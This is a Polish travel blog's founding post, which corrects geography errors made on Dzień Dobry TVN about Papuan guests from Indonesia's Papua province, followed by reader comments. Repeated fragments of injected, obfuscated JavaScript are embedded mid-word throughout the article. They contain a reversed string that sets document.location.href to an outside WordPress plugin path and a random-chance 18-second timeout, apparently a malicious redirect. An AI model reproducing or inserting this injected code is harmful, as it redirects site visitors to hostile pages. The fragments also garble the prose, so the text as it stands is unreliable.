Dlaczego powstała Republika Podróży?


Inspiracją i jednocześnie motywacją do powstania bloga podróżniczego RepublikaPodróży.pl było obejrzenie porannego materiału w popularnej telewizji śniadaniowej Dzień Dobry TVN. Telewizyjne studio TVN odwiedzili Yuliana Gombo i Scorpio Kogoya – papuascy podróżnicy, którzy przyjechali do Polski na zaproszenie dziennikarza Łukasza Pałki. Temat sam w sobie bardzo ciekawy i interesujący jednak ilość błędów natury geograficznej jaka pojawiła się w trakcie trwania programu po stronie prowadzących (Marcin Prokop i Dorota Wellman) nie mogła pozostać bez komentarza.

Istoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totą komedii omyłek było miejsce pochodzenia zaproszonych gości. Nie uchodzi wątpliwości, że byli oni Papuasami. To jest pewne w 100%. Później niestety nie było już tak łatwo…

W programie Łukasz Pałka – organizatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor przyjazdu papuaskich gości – mówi, że poznał Scorpio i Yulianę będąc na wakacjach w Papui Zachodniej. W tym samym momencie na dolnej belce pojawia się napis „Po raz pierwszy w Europie Paupasi z Papui Nowej Gwinei” (screen poniżej).

Dzień Dobry TVN - Papuasi

Po raz pierwszy w Europie Paupasi z Papui Nowej Gwinei.

Otóż Papua Zachodnia jest toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to zachodnia część wyspy o nazwie Nowa Gwinea (druga największa wyspa świata – zaraz po Grenlandii) i znajduje się w państwie o nazwie Indonezja. Papuas Scorpio (pomimo, że przedstawiony troszeczkę jako swojego rodzaju ‚dzikus z dżungli’) był tego świadom i wielokrotnie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to potwierdzał.

Mimo toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to stacja TVN konsekwentnie przyporządkowuje zaproszonym gościom nową ojczyznę – Papuę Nową Gwinę (screen poniżej). Zupełnie inne państwo (chociaż leżące na tej samej wyspie – Nowej Gwinei), w którym zaproszeni goście nigdy nie byli (w końcu nigdy nie wyjeżdżali za granicę).

Dzień Dobry TVN - Papuasi

TVN konsekwentnie przyporządkowuje zaproszonym gościom nową ojczyznę.

To jednak nie koniec niespodzianek. W pewnym momencie Dorota Wellman pyta: „Byłeś na Papui, prawda?

Hmm… „Być na” (poza kilkoma sąsiadami Polski (puls Węgry) jest używane w stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosunku do wysp lub/i państw się na nich znajdujących. Pytając czy Łukasz Pałka był na Papui, Dorota Wellman sugeruje, że był on na wyspie, której nie ma (bo przecież nie ma wyspy Papua) lub w państwie wyspiarskim Papua, którego również nie ma. Nieistniejące państwo na nieistniejącej wyspie – brzmi nieźle.

Mimo wszystko Łukasz Pałka potwierdza, że był na Papui, a wręcz stwierdza, że „Bo my znamy Papuę z Internetu”. Tutaj go trochę usprawiedliwię, ponieważ pod pojęciem Papua możemy jeszcze rozumieć prowincję Papua znajdującą się na wyspie Nowa Gwinea, będącą w granicach państwa Indonezja. Łukasz Pałka mógł również użyć skrótu myślowego odnoszącego się do prowincji Papua Zachodnia, w której twierdzi, że był (jak udowodnimy za chwilę, że niesłusznie)  i poznał zaproszonych później przez siebie gości.

Dzięki pomocy jednego z naszych czytelników (podziękowania dla Jacka Stefańskiego) okazuje się, że sam Łukasz Pałka pomylił miejsce swojego wakacyjnego pobytu. Podczas trwania programu dowiadujemy się, że zaproszeni Papuasi byli z plemienia Lani, które toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to nie mieszka w Papui Zachodniej lecz w sąsiedniej prowincji o nazwie Papua. Zdjęcia Łukasz pokazane podczas programu toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to potwierdzają. Widać na nich lotnisko w Wamenie, czy słynną mumię z wioski Jivika lezącej kilkanaście kilometrów od Kameny – wszystkie te miejsca nie znajdują się w Papui Zachodniej lecz Papui.

Podsumowując – zaproszeni przez Łukasza Pałkę gości z Azji Południowo-Wschodniej byli Papuasami z Indonezji mieszkającymi na wyspie Nowa Gwinea w prowincji Papua.

Całe szczęście, że ekipa TVN z prowadzącymi Marcinem Prokopem i Dorotą Wellman nie zaczęła  produkować kolejnych mieszanek tym razem z Gwineą. Przecież poza wyspą Nowa Gwinea mamy jeszcze kilka państw o tej pięknej nazwie: Gwinea, Gwinea Równikowa, Gwinea Bissau. Mamy też region Gwinea podzielony na Gwineę dolną i górną. Pomijam już całe pochodne w postaci zatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tok gwinejskich, wybrzeży a nawet złotych monet zwanych ‚Gwinea’:)

Stąd pomysł na blog podróżniczy o tematyce podróżniczo-geograficznej, który traktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towałby o szeroko pojętym temacie podróży jednocześnie nie zapominając i przybliżając aspekt geograficzny.

Pełny materiał z Dzień Dobry TVN „Papuasi w Polsce” możecie zobaczyć tutaj: http://dziendobry.tvn.pl/wideo,2064,n/papuasi-w-polsce,4426.html

Polecamy również:

Dodaj komentarz

Twój adres email nie zostanie opublikowany. Pola, których wypełnienie jest wymagane, są oznaczone symbolem *

19 komentarzy

 • Dziennikarze TVN popisali się geograficznym nieuctwem, ale nie tylko oni…. Geograficzne błędy popełnił także Łukasz Pałka […]. Łukasz konsekwentnie twierdzi, że był w Papui Zachodniej co jest błędem. Indonezyjska część wyspy Nowa Gwinea dzieli się na dwie prowincje: mniejszą właśnie o nazwie Papua Zachodnia ze stolicą w Manokwari i większą o nazwie Papua ze stolicą w Jayapura. Łukasz był w tej drugiej prowincji – Papua, a nie Papua Zachodnia. Plemię Dani, do którego przynależą goście programu, zamieszkuje dolinę Balien położoną na północny wschód od Wamen – miasta leżącego centralnie w prowincji Papua. Zresztą zdjęcia Łukasza to potwierdzają: widać na nich lotnisko w Wamenie, czy słynną mumię z wioski Jivika lezącej kilkanaście kilometrów od Kameny.

 • Musze przyznać, że jest to bardzo fajny wpis 🙂 Tak w ogóle jestem pierwszy raz na Twoim blogu, tak czy inaczej dodałem już go sobie do zakładek „Ulubione” i będę często zaglądać na Twój blog 🙂 Pozdrowienia 🙂

 • No cóż… jak się jest prowadzącym jakiegoś programu, to powinno się przygotować z danej dziedziny, a nie tylko wyjśc i zadać, już wcześniej przygotowane pytania. Niektórzy chyba są albo zbyt leniwi na takie doświadczenia albo po prostu zbyt ignoranccy (jejku istnieje w ogóle taka odmiana tego słowa?)
  Bardzo ciekawy pomysł 🙂

 • Powodzenia w podróżach,a dziennikarze – i tak są potrzebni, a błędy popełnia każdy 😉

 • Szczegóły, które zmieniają znaczenie całej treści. Dziennikarze na wszystkim nie muszą się znać, a nikt nie zadbał o ich wiedzę do materiału w programie.

 • Bardzo ciekawa inspiracja na bloga. Życzymy wielu lat pełnych fascynujących wpisów oraz podróży dookoła świata, czekamy na relacje. 🙂

 • Z jednej strony to śmieszne ale z drugiej cieszę się, że takie pomyłki miały miejsce, bo w końcu dzięki nim powstał Twój blog 🙂

 • świetnie że dbasz o prawdziwe inforamacje na temat Nowej Gwinei. telewizja czasem zapomina o odpowiedzialności za to co mówią…przecież można wprowadzić kogoś w błąd

 • Świetny artykuł! Skąd czerpiesz inspiracje kiedy nie masz pomysłu na tematy artykułów?

 • Fajnie, że poświęciłeś temu temat. Zbyt mało informacji przedstawia sytuację w Nowej Gwinei. Czas rozpisać temat 😉